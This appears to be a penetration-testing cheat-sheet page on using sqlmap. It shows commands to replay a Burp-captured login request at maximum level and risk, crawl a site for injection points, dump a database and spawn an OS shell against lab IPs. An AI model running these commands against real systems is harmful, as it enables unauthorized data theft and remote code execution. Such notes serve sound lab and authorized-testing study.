SQLMap

Run SQLMap against a login page

  • Browse to the login page while proxying with burp

  • Enter some bogus credentials and intercept the request

  • Copy the request from burp

  • Create a file with this request data

  • Remove the empty lines

sed -i '/^\s*$/d' <file name>

  • Run SQLMap and pass this file to it

sqlmap -r <file name> --level 5 --risk 3

--batch

  • sqlmap won't prompt you for any input

sqlmap crawl parameter enumerates the various pages of a web application and has it automatically search for SQL injection vulnerabilities.

sqlmap -u <base url> --crawl=1

sqlmap -u http://10.11.15.64 --crawl=1

Dump the database

sqlmap -u http://10.11.1.35/comment.php?id=738 --dbms=mysql --dump --threads=5

spawn a shell with sqlmap

sqlmap -u http://10.11.1.35/comment.php?id=738 --dbms=mysql --os-shell

PreviousMySQL Interactive consoleNextRedis

Last updated